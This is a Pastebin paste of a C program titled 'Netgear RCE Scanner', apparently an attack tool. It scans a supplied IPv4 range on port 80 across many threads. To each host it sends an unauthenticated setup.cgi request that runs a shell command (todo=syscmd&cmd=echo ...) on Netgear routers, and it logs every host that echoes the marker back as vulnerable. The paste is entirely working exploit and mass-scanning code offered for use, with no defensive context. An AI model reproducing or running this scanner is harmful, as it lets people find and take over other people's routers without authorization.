API tools faq
paste
Advertisement
KhaosBringer

Netgear RCE Scanner

KhaosBringer
Mar 26th, 2019
959
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.25 KB | None | 0 0
raw download clone embed print report
  1. /* Netgear unauthenticated command execution scanner */
  2.  
  3. #include <stdio.h>
  4. #include <fcntl.h>
  5. #include <stdlib.h>
  6. #include <unistd.h>
  7. #include <string.h>
  8. #include <signal.h>
  9. #include <pthread.h>
  10. #include <arpa/inet.h>
  11. #include <netinet/in.h>
  12. #include <sys/socket.h>
  13.  
  14. #define BUFSIZE 4096
  15.  
  16. int timeout;
  17. char *log_file;
  18. unsigned long start_ip, end_ip, ips_per_thread;
  19. volatile int vuln_found, running_threads, ips_scanned;  
  20. pthread_mutex_t file_mutex = PTHREAD_MUTEX_INITIALIZER;
  21.  
  22. void sighandler(int sig)
  23. {
  24.     fprintf(stdout, "\n");
  25.     exit(EXIT_SUCCESS);
  26. }
  27.  
  28. void *dongs(void *id)
  29. {
  30.     running_threads++;
  31.    
  32.     int thread_id = (int)id;
  33.     char ipbuff[16], sendbuff[BUFSIZE], recvbuff[BUFSIZE];
  34.     unsigned long current_ip, s_ip = start_ip + ips_per_thread * thread_id, e_ip = start_ip + ips_per_thread * (thread_id + 1);
  35.    
  36.     int s;
  37.     fd_set selset;
  38.     struct timeval tv;
  39.     struct sockaddr_in si_other;
  40.    
  41.     if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  42.         return;
  43.     }
  44.    
  45.     for (current_ip = s_ip; (e_ip >= end_ip && current_ip <= end_ip) || current_ip < e_ip; current_ip++) {
  46.         fcntl(s, F_SETFL, fcntl(s, F_GETFL, NULL) | O_NONBLOCK); // set socket non-blocking
  47.  
  48.     memset(&si_other, '\0', sizeof(si_other));
  49.         si_other.sin_family = AF_INET;
  50.         si_other.sin_port = htons(80);
  51.         si_other.sin_addr.s_addr = htonl(current_ip);
  52.    
  53.     tv.tv_sec = timeout;
  54.         tv.tv_usec = 0;
  55.    
  56.     FD_ZERO(&selset);
  57.         FD_SET(s, &selset);
  58.    
  59.     snprintf(ipbuff, sizeof(ipbuff), "%d.%d.%d.%d", (current_ip & 0xFF000000) >> 24, (current_ip & 0x00FF0000) >> 16, (current_ip & 0x0000FF00) >> 8, current_ip & 0x000000FF);
  60.     snprintf(sendbuff, sizeof(sendbuff), "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo lolimgay&curpath=/&currentsetting.htm=1 HTTP/1.1\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko\r\n\r\n", ipbuff);
  61.  
  62.     connect(s, (struct sockaddr *)&si_other, sizeof(si_other));
  63.  
  64.     if (select(s + 1, NULL, &selset, NULL, &tv) > 0) {
  65.         int n, valopt;
  66.         socklen_t len = sizeof(int);
  67.             getsockopt(s, SOL_SOCKET, SO_ERROR, &valopt, &len);
  68.    
  69.         if (valopt == 0) {
  70.                 fcntl(s, F_SETFL, fcntl(s, F_GETFL, NULL) & ~O_NONBLOCK); // set socket blocking
  71.             write(s, sendbuff, strlen(sendbuff)); // write the payload
  72.        
  73.         while ((n = read(s, recvbuff, BUFSIZE - 1)) > 0) {
  74.                 recvbuff[n] = '\0';
  75.                 if (strstr(recvbuff, "lolimgay")) {
  76.             vuln_found++;
  77.             pthread_mutex_lock(&file_mutex);
  78.             FILE *fp;
  79.             if (fp = fopen(log_file, "a")) {
  80.                 fprintf(fp, "%s\n", ipbuff);
  81.                 fclose(fp);
  82.             }
  83.             pthread_mutex_unlock(&file_mutex);
  84.             break;
  85.             }
  86.         }
  87.         }
  88.         }
  89.        
  90.         ips_scanned++;
  91.     }
  92.    
  93.     close(s);
  94.     running_threads--;
  95. }
  96.  
  97. int main(int argc, char **argv)
  98. {
  99.     if (argc < 6) {
  100.     fprintf(stderr, "Usage: %s <ip range start> <ip range end> <log file> <threads> <timeout>\n", argv[0]);
  101.     exit(EXIT_FAILURE);
  102.     }
  103.    
  104.     signal(SIGINT, sighandler);
  105.     signal(SIGPIPE, SIG_IGN);
  106.    
  107.     log_file = argv[3];
  108.     timeout = atoi(argv[5]);
  109.     int i, threadc = atoi(argv[4]);
  110.     pthread_t threads[threadc];
  111.    
  112.     inet_pton(AF_INET, argv[1], &start_ip);
  113.     inet_pton(AF_INET, argv[2], &end_ip);
  114.    
  115.     start_ip = ntohl(start_ip);
  116.     end_ip = ntohl(end_ip);
  117.    
  118.     ips_per_thread = (end_ip - start_ip + threadc / 2) / threadc; // do not truncate
  119.     unsigned long toscan = end_ip - start_ip;
  120.  
  121.     fprintf(stdout, "Starting Scanner...\n");
  122.    
  123.     for (i = 0; i < threadc; i++) {
  124.     pthread_create(&threads[i], NULL, dongs, (void *)i);
  125.     }
  126.    
  127.     fprintf(stdout, "Found\tLeft\tThreads\n");
  128.    
  129.     while (running_threads > 0) {
  130.     fprintf(stdout, "\r%d\t%lu\t%d", vuln_found, toscan - ips_scanned, running_threads);
  131.     fflush(stdout);
  132.     sleep(1);
  133.     }
  134.  
  135.     for (i = 0; i < threadc; i++) { // clean up thread resources
  136.     pthread_join(threads[i], NULL);
  137.     }
  138.    
  139.     pthread_mutex_destroy(&file_mutex);
  140.     fprintf(stdout, "\n");
  141.     exit(EXIT_SUCCESS);
  142. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!